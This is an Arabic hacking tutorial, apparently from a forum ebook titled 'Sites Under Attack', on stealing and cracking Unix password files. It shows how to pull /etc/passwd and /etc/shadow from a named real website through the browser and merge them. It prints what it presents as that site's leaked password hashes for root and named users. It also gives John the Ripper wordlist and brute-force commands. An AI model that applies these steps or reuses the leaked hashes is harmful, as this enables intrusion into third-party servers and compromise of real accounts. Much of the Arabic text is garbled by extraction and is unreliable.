‫‪root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:‬‬
‫‪sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer‬‬
‫‪Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp‬‬
‫‪Admin:/usr/lib/uucp: nuucp:x:9:9:uucp‬‬
‫‪Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network‬‬
‫‪Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/:‬‬
‫‪noaccess:x:60002:60002:No Access User:/:‬‬
‫‪nobody4:x:65534:65534:SunOS 4.x Nobody:/:‬‬
‫‪www:x:102:1001::/web:/bin/csh‬‬
‫‪mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu‬‬
‫‪sid:x:103:10::/export/home/sid:/bin/ksh‬‬
‫‪mirror:x:104:1::/home/mirror:/bin/sh‬‬
‫‪admin:x:105:1::/home/admin:/bin/sh‬‬
‫‪jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh‬‬
‫‪landmark:x:1000:1000::/web/landmark:/bin/ksh‬‬

‫‪١ ٥٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪------------------------------------------------------------------------------------------------‬‬
‫ﺘﻮي‬ ‫ﺘﺼ ﺮﺑﺸﻜ ﻞﻛﺒﯿ ﺮ ‪،‬ﻓﻌﻨﺪ ﺳ ﺤﺒﻪﻛﺎن ﯾ ﺤ‬ ‫ﻗﺪﺗﻜﻮنأﻛﺜ ﺮﺑﻜﺜﯿ ﺮ ‪ ،‬ﺣﯿﺚأن ﻫﺬااﻟﻤﻠ ﻒاﻟﻤﻮ ﺿﺢﺑﺎﻷﻋﻠﻰأ ﺧ‬ ‫و‬
‫ﺘﺠﺎوز ‪١٠‬أﺳﻄ ﺮ وﻫﻲ‬ ‫ﻋﻠﻰ آﻻﻻ فاﻟﺴﻄﻮر ‪،‬ﻟﯿ ﺲﻛ ﻞ ﻣﻠﻔﺎ تﻛﻠﻤﺎ تاﻟﻤ ﺮورﺑﻬﺬااﻟ ﺤﺠﻢﻓﯿﻮﺟﺪ ﻣﻨﻬﺎ ﻣﻦ ﻻ ﯾ‬
‫اﻟﻤﻮﺟﻮدهﺑﻜﺜ ﺮه ‪ ،‬ﻋﻠﻰاﻟﻌﻤﻮمأﻧ ﺖاﻟ ﺤﯿﻦ ﻋﻠﯿﻚﺗﻌ ﺮ فﺑﺄن ﻣﻠ ﻒﻛﻠﻤﺔاﻟﻤ ﺮور ﻫﻮاﻟﺬيﻓﻲ دا ﺧﻠﻪﺗﻮﺟﺪ‬
‫ﺣﺴﺎﺑﺎ تاﻷﺷﺨﺎ صاﻟﻤ ﺮ ﺧ ﺺﻟﻬﻢﺑﺎﻟﺪ ﺧﻮ لاﻟﻰ ﺎﻟﺴﯿ ﺮﻓ ﺮ ‪......‬‬

‫‪-‬ﺑﻤﺎذا ﯾﻔﯿﺪﻧﻲ ﻫﺬا ﺎﻟﻤﻠ ﻒ ؟‬


‫~~~~~~~~~~~~~~~~~~~~~~~~~~‬
‫ﻗﻊ ‪ ،‬وﻟﻜﻦ ﻻﺗﻔ ﺮ ح ‪!...‬‬ ‫ﺘ ﺮا قاﻟﻤﻮ‬‫ﺘﺨﺪﻣﯿﻦﻟﻜﻲﺗﻘﻮمﺑﺈ ﺧ‬ ‫ﯾﻔﯿﺪك ﯾﺎاﻟ ﺤﺒﯿﺐﻓﻲ ﻣﻌ ﺮﻓﻪﻛﻠﻤﺎ تاﻟﺴ ﺮ ﻮإﺳﻤﺎ ءاﻟﻤﺴ‬
‫ﻗ ﺖاﻟ ﺤﺎﻟﻲ ﻫﻲ‬ ‫ﻛﻠﻤﺔاﻟﻤ ﺮورﺗﻜﻮن ﻣﺸﻔ ﺮه ‪ ،‬ﻻ ﻫﺬاﻟﯿ ﺲ ﺻ ﺤﯿ ﺤﺎﺗﻤﺎﻣﺎ ‪،‬ﻛﺎﻧ ﺖ ﻣﺸﻔ ﺮه زﻣﺎن وﻟﻜﻦﻓﻲاﻟﻮ‬
‫ﻣ ﻀﻠﻠﻪ‬
‫*ﺎو = ‪x‬ﻛﻠﻤﺔ ﺳ ﺮ ﻣ ﻀﻠﻠﻪ ‪Shadowed‬‬
‫ﺘﺨﺪمﻓﻲ‬ ‫ﺘﺸﻔﯿ ﺮاﻟﻤﺴ‬ ‫= ‪EpGw4GekZ1B9U‬ﻛﻠﻤﺔ ﺳ ﺮ ﻣﺸﻔ ﺮه ﻋﻠﻰ ﻣﻘﯿﺎس ‪DES ،‬ﻫﺬااﻟﻨﻮ ع ﻣﻦاﻟ‬
‫ﺘﻞ‬‫ﻗﻢﻛﺒ‬ ‫ﻟﯿﻮﻧﻜ ﺲ و ‪ FreeBSD‬ﻮﻋﺪد ﻣﻦاﻷﻧﻈﻤﻪ ﺎﻷ ﺧ ﺮى ﺿﻌﯿ ﻒ ‪ ،‬وﻫﻮ داﺋﻤﺎ ﻣﻜﻮن ﻣﻦ ‪ ١٣‬ﺣ ﺮ ف ور‬
‫ﺘﺸﻔﯿ ﺮ وﻫﻮ ﻧﻮ ع‬ ‫ﺘﺨﺪم ﻧﻮ ع آ ﺧ ﺮ ﻣﻦاﻟ‬‫ﺘﺜﻨﺎ ء وﯾﻨﺪوزﻓﻬﻮ ﯾﺴ‬
‫ً ‪،‬ﺑﺈﺳ‬
‫ﺘﻮي ﻣﻦﺑﯿﻨﻬﺎ ﻋﻠﻰ رﻣﺰاﺑﺪا‬ ‫وﺳﻤﻮ ل وﻻ ﯾ ﺤ‬
‫ﺿﻌﯿ ﻒأﯾ ﻀﺎ‪.‬‬

‫‪-‬ﻛﯿ ﻒ ﯾﻤﻜﻦ ﻣﻌ ﺮﻓﺔﻛﻠﻤﺔاﻟﺴ ﺮ ﻣﻦ ﺧﻼ ل ﻣﻠ ﻒاﻟﺒﺎﺳﻮرد ‪ password file‬؟‬


‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬
‫ﺘﻘ ﺮا ء ﻣﻦاﻟﯿﺴﺎراﻟﻰ ﺎﻟﯿﻤﯿﻦ ‪،‬ﺛﻢإذﻫﺐاﻟﻰ‬‫ﺈ ﺿﻐﻂ ‪Ctrl + Shift‬ﻓﻲاﻟﻘﺴ ﻢاﻷﯾﻤﻦ ﻣﻦﻟﻮ ﺣﻪاﻟﻤﻔﺎﺗﯿﺢﻟ‬
‫ﻗﻊ ‪hwwilson.com ...‬‬ ‫اﻻﻋﻠﻰ ﺣﯿﺚ و ﺿﻌ ﺖ ﻣﺜﺎ لﻟﻤﻠ ﻒﻛﻠﻤﺔ ﻣ ﺮورﺗﻢ ﺳ ﺤﺒﻪ ﻣﻦاﻟﻤﻮ‬
‫ﺗﻔﺴﯿ ﺮ ﻫﺬااﻟﺴﻄ ﺮ ‪-:‬‬
‫‪root:x:0:1:Super-User:/:/sbin/sh‬‬

‫‪root‬‬
‫ﺘﺨﺪم واﻟﻠﻲ ﻫﻮاﻟﺠﺬر‪root‬‬ ‫ﻫﺬااﻟﺴﻄ ﺮ ﯾﻮ ﺿ ﺦاﻟﻤﺴ‬
‫ﺘ ﺤﯿ ﻞ ‪،‬‬
‫ﺘ ﻀﺢاﻧﻬﺎ ﻣ ﻀﻠﻠﻪ ‪ ،‬ﯾﻌﻨﻲ ﻣﻜﺎﻧﻬﺎ ﺎﻟﻌﻼﻣﺔ ‪ x ،‬ﻻﺗﻔﻜ ﺮﻓﻲﻛﺴ ﺮﻫﺎﻓﻬﺬا ﻣﺴ‬‫‪ x‬ﻫﻲﻛﻠﻤﺔاﻟﻤ ﺮور ‪ ،‬وﯾ‬
‫ﺘﻌ ﺮ فﺑﻌﺪﻗﻠﯿ ﻞﻛﯿ ﻒﺗﻔﻌ ﻞ ﻫﺬا‪..‬‬
‫ﻟﻜﻦ ﻋﻠﯿﻚاﻟﺒ ﺤﺚ ﻋﻦ ﻣﻠ ﻒﺛﺎﻧﻲﺗﻢﺗﺨﺰﯾﻦﻓﯿﻪﻛﻠﻤﺔاﻟﻤ ﺮور ‪ ،‬ﺳ‬
‫‪0‬‬
‫ﺘﺨﺪم‬ ‫ﻗﻢ ﺎﻟﻤﺴ‬‫ﻫﺬا ﻫﻮ ر‬
‫‪1‬‬
‫ﻗﻢاﻟﻤﺠﻤﻮﻋﻪ‬ ‫ﺮ‬
‫‪ Super-User:/:/sbin/sh‬و ﻫﺬا ﻣ ﺶ ﻣﻬﻢ‬
‫‪++++++++++++++++++++++++++++‬‬
‫ﺎﻟﺠﺰ ءاﻟﺜﺎﻟﺚ‬
‫‪-‬ﻣﺎاﻟﻔ ﺮ قﺑﯿﻦإذاﻛﺎناﻟﻤﻠ ﻒ )ﻣﺸﻔ ﺮ )‪ encryption‬ﻮإذاﻛﺎن )ﻣ ﻀﻠ ﻞ )‪ shadowed‬؟‬
‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬
‫ﺎﻟﻤﻠ ﻒاﻟﻤ ﻀﻠ ﻞ ‪ shadow file‬ﯾﻜﻮن ﻣﻜﺎنﻛﻠﻤﺔاﻟﻤ ﺮور رﻣﺰ ﻣﺜ ﻞ *أو ‪x‬ﺄو ‪#‬أو ! وﻫﺬا ﻣﺜﺎ لﻟﻬﺎ‬
‫ﺘﻮﺑﻪ وﻟﻜﻦ‬ ‫‪ root:x:0:1:Super-User:/:/sbin/sh‬ﻟﻜﻦاﻟﻤﻠ ﻒاﻟﻤﺸﻔ ﺮﺗﻜﻮنﻛﻠﻤﺔ ﺎﻟﻤ ﺮور ﻣﻜ‬
‫ﻣﺸﻔ ﺮه ﻣﺜ ﻞ ﻫﺬه ‪root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh‬‬

‫‪١ ٥١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻫﻨﺎﺗﻜﻮنﻛﻠﻤﺔاﻟﻤ ﺮور ﺎﻟﻤﺸﻔ ﺮه ﻫﻲ ‪Q71KBZlvYSnVw‬‬


‫ﺎﻵن ﻃﻠﻌ ﺖاﻟﺼﻮره ﺻﺎﻓﯿﻪ ‪....‬‬

‫ﺘﻢﻛﺴ ﺮه ؟‬‫‪-‬ﻮﻣﺎذاﻟﻮﻛﺎن ﻣﻠ ﻒﻛﻠﻤﺔاﻟﻤ ﺮور ﻣﺸﻔ ﺮ ‪،‬ﻛﯿ ﻒ ﯾ‬


‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬
‫ﺎﻟﺒ ﺮاﻣ ﺞﻛﺜﯿ ﺮه وأﺷﻬ ﺮﻫﺎ ﻫﻮ ‪ Crack 5.0a‬ﻮ ‪ john the ripper‬ﻮﯾﻮﺟﺪ آ ﺧ ﺮﺑﺈﺳﻢ ‪jack the‬‬
‫‪ripper ،‬ﺈذاﻛﻨ ﺖ ﻣﻤﻦ ﯾﺠﯿﺪوناﻟﻌﻤ ﻞﻓﻲﻟﯿﻮﻧﻜ ﺲﻓﻬﺬا ﺟﯿﺪ ‪ ،‬ﻋﻠﯿﻚﺗﻨﺰﯾ ﻞ ‪ Crack 5a ،‬ﻮأﻓ ﻀ ﻞ ‪john‬‬
‫ﺘﺨﺪام وﯾﻨﺪوز ‪ ،‬وﻟﻠﻤﻌﻮﻟﻤﯿﻪﻓﺈن ‪ john the ripper‬ﻋﻤ ﻞأﯾ ﻀﺎﺗ ﺤ ﺖﻟﯿﻮﻧﻜ ﺲ‬ ‫‪the ripper‬ﻟﻤﻦ ﯾ ﺮﯾﺪإﺳ‬
‫‪.....‬‬
‫ﻃ ﺮﯾﻘﻪ ﻋﻤ ﻞﻫﺬهاﻟﺒ ﺮاﻣ ﺞ ‪-:‬‬
‫ﯾﻘﺪمﻟﻠﺒ ﺮﻧﺎﻣ ﺞ ‪ wordlist‬ﻮﯾﻘﻮمﺑﻤﻄﺎﺑﻘﻪاﻟﻜﻠﻤﺎ تاﻟﻤﻮﺟﻮدهﺑﻪ ‪،‬ﻛﻤﺎ ﻫﻮ ﻣﻮ ﺿﺢ ﻫﻨﺎ ‪.‬‬
‫‪--------------------------------------------------- \ Q2wrtUo9LPq2R <------‬‬
‫ﺘﻢ‬‫ﺘﻰ ﯾ‬‫ﺘﺎره ﺣ‬ ‫ـ ‪ wordlist‬ﺎﻟﻜﻠﻤﺎ ت ﺎﻟﻤﺨ‬ ‫ﺘﻢ ﻣﻘﺎرﻧﻪ ‪<---‬ﺎﻟﺒﺪاﯾﻪ )ﻛﻠﻤﺔاﻟﻤ ﺮوراﻟﻤﺸﻔ ﺮه( ﻣﻊأ ﺧﺬﻛﻠﻤﺔ ﻣﻦاﻟ‬ ‫ﯾ‬
‫ﺘﺎره ﻣﻦاﻟﻘﺎﺋﻤﺔ‬ ‫ﺘﻄﺎﺑ ﻖ‪Q6LiJ6ct1oUBz <-‬ﻛﻠﻤﺔ ﻣ ﺮور ﻣﺸﻔ ﺮه ﻣﻊ اﻟﻜﻠﻤﺔاﻟﻤﺨ‬ ‫‪word list‬اﻟ‬
‫ﺘﻲﻛﺎﻧ ﺖ ﻣﺸﻔ ﺮهﻗﺪﻛﺴ ﺮ ت ‪..‬‬ ‫وﻟﻨﻔ ﺮ ض ﻣﺜﻼ ‪ song‬ﻓﺎذا ﺣﺪ ثﺗﻄﺎﺑ ﻖﻓﻬﺬا ﯾﻌﻨﻲأنﻛﻠﻤﺔاﻟﻤ ﺮوراﻟ‬
‫| ‪| -------------------------------------------------------------------------------‬ﻣﻼ ﺣﻈﻪ ﻣﻬﻤﻪ ‪-:‬‬
‫ﺘﻢ ﻋﻤ ﻞ دوره ﻣﺜ ﻞاﻟﻤﻮ ﺿ ﺤﻪﻓﻲاﻷﻋﻠﻰﻟﻜﺴ ﺮﻛﻠﻤﺎ تاﻟﻤ ﺮوراﻟﻤﺸﻔ ﺮهﺑﺴ ﺮﻋﻪ‬ ‫ﯾ‬
‫ﺘﺒ ﺮﻧﺎ‪john the ripper‬ﻋﻠﻰ ﻣﻌﺎﻟ ﺞﺑﺴ ﺮﻋﻪ ‪(٧٠٠‬‬ ‫{ﺎﻟﻨﻬﺎﯾﻪ{ | ‪٥٠٠٠‬ﺗﺠ ﺮﺑﻪﻓﻲاﻟﺜﺎﻧﯿﻪ )إ ﺧ‬
‫‪| -------------------------------------------------------------------------------‬‬
‫ﺘﺎﻟﻲ‬
‫ﺘﺐاﻷﻣ ﺮاﻟ‬ ‫ﺘﺸﻐﯿ ﻞ ‪ john the ripper‬ﻣﻦ واﺟﻪ دوس ﻧﻜ‬ ‫ﻟ‬
‫‪john -w:wordlist passwd‬‬
‫ﺘﻮي ﻋﻠﻰ ﻋﺪدﻛﺒﯿ ﺮ ﻣﻦاﻟﻜﻠﻤﺎ ت‬ ‫ﺣﯿﺚ ‪wordlist‬ﻫﻮ ﻣﻠ ﻒاﻟﻘﺎﻣﻮساﻟﺬي ﯾ ﺤ‬
‫ﺘﻬﺎ‬ ‫ﺘﻲ ﻧﻮد ﻣﻌ ﺮﻓ‬ ‫ﺘﻮي ﻋﻠﻰﻛﻠﻤﺎ تاﻟﻤ ﺮوراﻟﻤﺸﻔ ﺮه واﻟ‬ ‫ﻮ ‪passwd‬ﻫﻮاﻟﻤﻠ ﻒاﻟﺬي ﯾ ﺤ‬
‫‪-------------------------------------------------------------------------------‬‬
‫‪Microsoft(R) Windows 98‬‬
‫(‪C)Copyright Microsoft Corp 1981-1998.‬‬

‫‪E:\Desktop\junk\john the ripper>john -w asswd passwd.txt‬‬

‫‪by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996‬‬
‫‪Loaded 1 password‬‬

‫‪**v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE‬‬

‫‪>E:\Desktop\junk\john the ripper‬‬


‫‪------------------------------------------------------------------------------------------------‬‬

‫ﺘ ﺮي ‪ ،‬وﻋﻠﯿﻚ ﺣﺬ فﻫﺬااﻟﻤﻠ ﻒإذا‬ ‫ﺘﯿﺠﻪﻓﻲاﻟﻤﻠ ﻒ ‪ john.pot‬ﺎﻟﻤﻮﺟﻮدﻓﻲ ﻧﻔ ﺲاﻟﺪاﯾ ﺮوﻛ‬ ‫ﻮﺳﻮ فﺗ ﺤﻔﻆاﻟﻨ‬


‫أرد تاﻟﺒﺪ ءﻓﻲ ﻋﻤﻠﯿﻪﻛﺴ ﺮ ﺟﺪﯾﺪه وﯾﻤﻜﻨﻚﺗﻐﯿﯿ ﺮإﺳﻤﻪأو ﻧﻘﻠﻪﻓﻲ ﻣﻜﺎن آ ﺧ ﺮﺑﺪ ل ﻣﻦ ﺣﺬﻓﻪإذاﻛﻨ ﺖﺗ ﺮى ذﻟﻚ‬
‫‪...‬‬

‫ﺘﺎجﻟﻤﻠ ﻒ‬
‫ـ ‪brute force‬ﺄوﺑﺎﻟﻌ ﺮﺑﻲاﻟﻘﻮهاﻟﻌﻨﯿﻔﻪ ‪ ،‬وﻫﻲ ﻻﺗ ﺤ‬
‫ﻫﻨﺎك ﻃ ﺮﯾﻘﻪا ﺧ ﺮىﻟﻠﻜﺴ ﺮ وﻫﻲﺗﺴﻤﻰﺑ‬

‫‪١ ٥٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺎن و‪ ٣‬ﺧﺎﻧﺎ ت وارﺑﻊ‬‫ﻗﺎم واﻟ ﺮﻣﻮز ﻣﻊﺑﻌ ﺾﻓﻲ ﺧﺎﻧ‬ ‫ﺘﺠ ﺮﺑﻪﻛ ﻞاﻟ ﺤ ﺮو ف واﻷر‬
‫‪wordlist ،‬ﻫﻲﺗﻘﻮمﺑ‬
‫ﺘﺨﺪم ﻣﻠﻔﺎ ت ‪wordlist‬ﻓﺬﻟﻚﻟﻦ ﯾﺄ ﺧﺬ‬ ‫ﺘﻰﺗﺼﯿﺐﻛﻠﻤﺔاﻟﻤ ﺮوراﻟﺼ ﺤﯿ ﺤﻪ ‪ ،‬وأﻧﺎاﻓ ﻀ ﻞانﺗﺴ‬ ‫و ﺧﻤ ﺲ ‪..‬اﻟ ﺦ ﺣ‬
‫ﺘﺠ ﺮﺑﻪاﻟﻤﻮ ﺿ ﺤﻪﻓﻲاﻟ ﺮﺳﻢﺑﺎﻷﻋﻠﻰ ذﻛ ﺮ تﺑﺄﻧﻪ ﺳ ﺮﻋﺔﺗﺠ ﺮﺑﻪ ﺎﻟﻜﻠﻤﺎ ت‬ ‫ﻣﻌﻚﻓﻲاﻻﺛﻮاﻧﻲﻓﻘﻂﻷن ﻋﻤﻠﯿﻪاﻟ‬
‫ﺘﺠﺎوز ‪٥٠٠٠‬ﻛﻠﻤﺔﻓﻲاﻟﺜﺎﻧﯿﻪ ‪،‬إذاﻟﻢﺗﻔﻠﺢ ﻣﻠﻔﺎ ت ‪ wordlist‬ﺣﯿﻨﻬﺎإذﻫﺐاﻟﻰ ﺎﻟﻘﻮهاﻟﻌﻨﯿﻔﻪ ‪brute‬‬ ‫ﯾ‬
‫ﺘﺨﺪم ﻃ ﺮﯾﻘﻪ ‪ brute force‬ﺎﻟﺴﺎﺑ ﻖ ذﻛ ﺮﻫﺎ‬ ‫ﺘﺎﻟﻲ ﯾﺠﻌ ﻞ ‪ john the ripper‬ﯾﺴ‬ ‫‪ .... force‬اﻷﻣ ﺮاﻟ‬

‫‪john -i passwd‬‬

‫ﺛﻨﺎ ء ﻋﻤ ﻞ‬‫ﺘ ﺮأ‬‫ﺘﺠ ﺮﺑﻪ ﻫﺬهاﻟﻄ ﺮﯾﻘﻪإ ﺿﻐﻂإﻧ‬ ‫ﺣﯿﺚ ‪passwd‬ﻫﻮ ﻣﻠ ﻒﻛﻠ ﻤﺔاﻟﻤ ﺮوراﻟﻤ ﺮادﻛﺴ ﺮه ‪،‬إذاﻗﻤ ﺖﺑ‬
‫ﺘ ﺮىاﻟﻰأﯾﻦﺗﻮ ﺻ ﻞ ‪...‬‬ ‫اﻟﺒ ﺮﻧﺎﻣ ﺞﻟ‬
‫‪-‬ﻮﻟﻮﻛﺎن ﻣﻠ ﻒﻛﻠﻤﺔاﻟﻤ ﺮور ﻣ ﻀﻠ ﻞ ‪ ،‬ﻣﺎذا ﻋﻠﻲانأﻋﻤ ﻞ ؟‬
‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬
‫ﺪاﺋﻤﺎ ﺳﻮ فﺗﻮاﺟﻪﻛﻠﻤﺔ ﻣ ﺮور ﻣ ﻀﻠﻠﻪ ‪،‬ﻟﻜﻦﻫﻨﺎك ﻃ ﺮﯾﻘﻪﺗﺴﻤﻰ ‪Unshadow‬ﻟ ﺤ ﻞ ﻫﺬهاﻟﻤﺸﻜﻠﻪ !!‬
‫ﺈذا ﻮاﺟﻬ ﺖ ﻣﻠ ﻒ ﻣ ﻀﻠ ﻞ ﻋﻠﯿﻚاﻟﺒ ﺤﺚ ﻋﻦ ﻣﻠ ﻒﺛﺎﻧﻲ ﯾﺴﻤﻰ ﻣﻠ ﻒاﻟﺸﺎدو )ﻣﻠ ﻒاﻟﻈ ﻞ( ‪shadow file‬‬
‫ﺘﺎﻟﻲ ‪:‬‬‫وﻫﺬااﻟﻤﻠ ﻒ ﯾﻮﺟﺪﻓﻲاﻣﻜﻨﻪ ﻣﻌﯿﻨﻪ وﻛ ﻞ ﻧﻈﺎمﺗﺸﻐﯿ ﻞﻟﻪ ﻣﻜﺎن ﯾﻮ ﺿﻊﺑﻪ ﻫﺬااﻟﻤﻠ ﻒ ‪ ،‬ﺎﻟﯿﻚاﻟﺠﺪو لاﻟ‬
‫* = ‪Linux : /etc/shadow token‬‬
‫ﺘﻌﺪدهاﺷﻬ ﺮﻫﺎ ﻫﻮ *‬ ‫= ‪SunOS : /etc/shadow token‬ﯾﺄ ﺧﺬأﺷﻜﺎ ل ﻣ‬
‫* = ‪FreeBSD : /etc/master.passwd or /etc/shadow token‬ﻮاﻟﺠﺪﯾﺪ ﻫﻮ ‪x‬‬
‫‪IRIX : /etc/shadow token = x‬‬
‫! = ‪AIX : /etc/security/passwd token‬‬
‫* = ‪ConvexOS : /etc/shadow or /etc/shadpw token‬‬
‫‪token‬ﺗﻌﻨﻲاﻟ ﺮﻣﺰاﻟﺬي ﯾﻮﺟﺪﻓﻲاﻟﻤﻠ ﻒ ‪ passwd ،‬ﻮﻫﺬا ﯾﻔﯿﺪﻓﻲﺗﺴﻬﯿ ﻞاﻟﻤﻬﻤﻪ ‪ ،‬ﯾﻌﻨﻲﻟﻮ ﻣﺜﻼﻟﻘﯿ ﺖ‬
‫ﻋﻼﻣﻪ !ﺑﺪ لﻛﻠﻤﻪاﻟﻤ ﺮورﻓﻬﺬا ﯾﻌﻨﻲانﻛﻠﻤﺔاﻟﻤ ﺮور ﻣﺴﺠﻠﻪﻓﻲ ‪/etc/security/passwd ،‬ﻟﻘﺪ‬
‫ﺘﻌﻨ ﺖﺑﺎﻟﺠﺪو لاﻟﺴﺎﺑ ﻖ ذﻛ ﺮه ‪ ،‬ﻣﺜﺎ ل ﻋﻠﻰ ﻣﻠ ﻒ ﺷﺎدو )أﻛ ﺮر ﻣﻠ ﻒ ﺷﺎدوﻫﻮاﻟﻤﻠ ﻒاﻟﺬيﺗﺨﺰنﻓﯿﻪﻛﻠﻤﺔ‬ ‫إﺳ‬
‫اﻟﻤ ﺮوراﻟﺼ ﺤﯿ ﺤﻪ(‬
‫ﻫﺬا ﻣﻠ ﻒ ‪shadow‬‬
‫‪------------------------------------------------------------------------------------------------‬‬
‫‪root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445::::::‬‬
‫‪adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935::::::‬‬
‫‪lp:NP:6445::::::‬‬
‫‪------------------------------------------------------------------------------------------------‬‬
‫ﻧﻼ ﺣﻆانﻛﻠﻤﺎ تاﻟﺴ ﺮ ﻣﻮﺟﻮده‬
‫ﺎﻟﺨﻄﻮهاﻷ ﺧﯿ ﺮه وﻫﻲ دﻣ ﺞ ﻣﻠ ﻒاﻟﺒﺎﺳﻮرد ‪ passwd file‬ﻣﻊ ‪shadow passwd‬ﻟﻨ ﺤﺼ ﻞ ﻋﻠﻰ ﻣﻠ ﻒ‬
‫ﺘﻜﺎﻣ ﻞ وﻧﻘﺪﻣﻪاﻟﻰﺑ ﺮاﻣ ﺞاﻟﻜﺴ ﺮاﻟﺴﺎﺑ ﻖﺬﻛ ﺮﻫﺎ‪...‬‬ ‫ﻣ‬
‫ﻫﺬا ﻣﻠ ﻒﺑﺎﺳﻮرد ﺣﺼﻠﻨﺎ ﻋﻠﯿﻪ ﻣﻦ ‪http://wilsonweb2.hwwilson.com/etc/passwd‬‬
‫‪------------------------------------------------------------------------------------------------‬‬
‫‪root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:‬‬
‫‪sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer‬‬
‫‪Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp‬‬
‫‪Admin:/usr/lib/uucp: nuucp:x:9:9:uucp‬‬
‫‪Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network‬‬
‫‪Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/:‬‬

‫‪١ ٥٣‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

noaccess:x:60002:60002:No Access User:/:


nobody4:x:65534:65534:SunOS 4.x Nobody:/:

www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/ksh
mirror:x:104:1::/home/mirror:/bin/sh
admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh
landmark:x:1000:1000::/web/landmark:/bin/ksh
------------------------------------------------------------------------------------------------
‫ ﻧﻌ ﺮ ف ﻣﻦ ﺧﻼ لاﻟﺠﺪو لاﻟﺴﺎﺑ ﻖ ذﻛ ﺮهﺑﺄنﻛﻠﻤﺔ ﺎﻟﻤ ﺮوراﻟﺼ ﺤﯿ ﺤﻪﻓﻲ‬x ‫ ﺎﻟﻤﻮ ﺿﺢ واﻟﻠﻲﻫﻮ‬token ‫ـ‬ ‫ﻮﻣﻦاﻟ‬
/etc/shadow ‫اﻟﺪﻟﯿ ﻞ‬
‫ﺘﺼﻔﺢاﻟﻰ‬ ‫ﺘﻮﺟﻪﺑﺎﻟﻤ‬ ‫ﺈذن ﻧ‬
http://wilsonweb2.hwwilson.com/etc/shadow
‫ﻟﻨ ﺤﺼ ﻞ ﻋﻠﻰ ﺎﻟﻤﻠ ﻒ‬
------------------------------------------------------------------------------------------------
root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445::::::
bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445::::::
smtp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445::::::
listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445::::::
nobody4:NP:6445:::::: www:WJctaI.8rcSe2:10507::::::
mirrors:gg9p.5kwGw1MY:10911:::::: sid:stXldZKnujFYo:10515::::::
mirror:iMPWwbrU.gB4k:10601:::::: admin:hDhB5YYKyWgQw:10976::::::
jerome:XDqnOl32tPoGo:10976:::::: erl:0jE9Xem4aJYeI:10982::::::
landmark:0jCgWu6vl8g0s:11185::::::
------------------------------------------------------------------------------------------------
‫ ﻮﻫﻜﺬا ﻣﻊ ﺟﻤﯿﻊ‬، ‫ﻓﻲ ﻣﻠ ﻒاﻟﺒﺎﺳﻮرد‬x ‫ﻧﻘﻮمﺑﻨﺴ ﺦﻛﻠﻤﺎ تاﻟﺴ ﺮاﻟﻤﻮﺟﻮدهﻓﯿﻪ وﻟﺼﻘﻬﺎ ﻣﻜﺎن ﻋﻼﻣﻪ‬
‫ﺘﻜﺎﻣ ﻞ وﻧﻘﺪﻣﻪاﻟﻰﺑ ﺮاﻣ ﺞ ﺎﻟﻜﺴ ﺮ‬‫اﻟ ﺤﺴﺎﺑﺎ تﻟﻨ ﺤﺼ ﻞ ﻋﻠﻰ ﻣﻠ ﻒﻛﻠﻤﺔ ﻣ ﺮورﻛﺎﻣ ﻞ وﻣ‬
-: ‫ﻣﻼ ﺣﻈﻪ ﻣﻬﻤﻪ‬
... ‫ﺘﻌ ﺮ ف ﻋﻠﯿﻬﺎﺑ ﺮاﻣ ﺞاﻟﻜﺴ ﺮ‬
‫ﺘ‬‫ﺘﻬﺎﻟ‬ ‫ ﯾﻌﻨﻲﺗ ﺮﺑ‬، ‫ﻋﻠﯿﻚ ﺟﻌ ﻞﻛ ﻞ ﺣﺴﺎبﻓﻲ ﺳﻄ ﺮ‬
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-: ‫ﺘ ﺤ ﻖاﻟﺰﯾﺎره‬ ‫ﻗﻊﺗﺴ‬ ‫ﻣﻮا‬
‫ﺄرﺷﯿ ﻒﻟﺜﻐ ﺮا ت‬
